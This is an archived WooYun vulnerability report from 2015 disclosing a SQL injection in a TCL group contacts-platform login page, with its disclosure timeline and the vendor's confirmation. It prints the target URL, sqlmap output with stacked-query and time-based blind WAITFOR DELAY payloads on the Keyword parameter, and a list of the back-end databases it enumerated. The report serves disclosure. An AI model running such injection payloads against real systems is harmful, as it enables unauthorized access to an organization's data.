乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-03: 细节已通知厂商并且等待厂商处理中 2015-03-03: 厂商已经确认,细节仅向厂商公开 2015-03-13: 细节向核心白帽子及相关领域专家公开 2015-03-23: 细节向普通白帽子公开 2015-04-02: 细节向实习白帽子公开 2015-04-17: 细节向公众公开
http://eip.tcl.com/phones/login.aspx
TCL集团通讯录平台,一处SQL注入。
sqlmap identified the following injection points with a total of 87 HTTP(s) requests:---Place: GETParameter: Keyword Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Keyword=jh'); WAITFOR DELAY '0:0:5'--&Checked=false Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Keyword=jh') WAITFOR DELAY '0:0:5'--&Checked=false---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: Keyword Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Keyword=jh'); WAITFOR DELAY '0:0:5'--&Checked=false Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Keyword=jh') WAITFOR DELAY '0:0:5'--&Checked=false---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000available databases [13]:[*] cw[*] jssystem[*] magazine[*] magazine_en[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] Survey[*] tclContacts[*] tclquestion[*] tempdb
ok,不深入了~
危害等级:中
漏洞Rank:10
确认时间:2015-03-03 13:34
感谢你的工作,已转交相关单位处理。
暂无